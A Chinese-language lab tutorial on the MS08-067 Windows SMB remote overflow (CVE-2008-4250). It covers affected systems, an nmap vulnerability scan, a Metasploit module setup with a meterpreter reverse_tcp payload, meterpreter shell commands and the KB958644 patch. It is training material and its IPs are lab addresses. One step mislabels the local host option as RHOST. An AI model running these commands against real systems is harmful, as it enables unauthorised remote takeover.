3.7.2 ms08-067
漏洞名称
MS08-067远程溢出漏洞(CVE-2008-4250)
漏洞等级
高危
漏洞描述
MS08-067 漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。
NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。
漏洞影响
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta
漏洞复现
实验环境
操作机 :Kali 2017
操作机IP:172.16.11.2
目标机:Windows XP S2 中文版
目标机IP:172.16.12.2
实验步骤
第1步 漏洞探测 打开Kali终端,使用Nmap对目标机开放端口进行扫描
nmap -sV -Pn 172.16.12.2
目标机开放了135139
445``3389端口,且目标机系统为Windows_XP。一想到XP或者2003系统的445端口开放,我们就能想到轰动一时的ms08-067。
我们使用nmap的漏洞扫描脚本查看漏洞是否可用
nmap -sV -Pn -p 445 --script smb-vuln-ms08-067.nse 172.16.12.2
扫描结果VULNERABLE,可以利用
第2步 漏洞利用
终端内输入msfconsole打开 metasploite 命令行客户端,使用search命令查找ms08-067的漏洞利用模块
使用该模块,并查看配置
需要设置目标地址,设置命令:
set RHOST 172.16.12.2
之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload
set payload windows/meterpreter/reverse_tcp
当然载荷也需要进行配置,所以我们选择渗透所用的载荷后,同样使用show options查看配置信息
配置中缺少本地主机 RHOST,设置一下
MS08-067 针对不同的系统可以选择不同的target,使用命令show targets可以看见支持的系统
我们选择此次目标机的系统,编号10 set target 10
配置完成后如下
成功获取来自目标主机的Session会话
第3步:Meterpreter常用命令
我们已经成功的获取Session会话了,接下来,我们使用meterpreter的一些常用基本功能
sysinfo
使用sysinfo命令可以查看目标系统的基本信息
shell
shell 命令用于获取一个可以交互的shell,方便执行系统命令
漏洞修复
相关补丁
KB958644
Last updated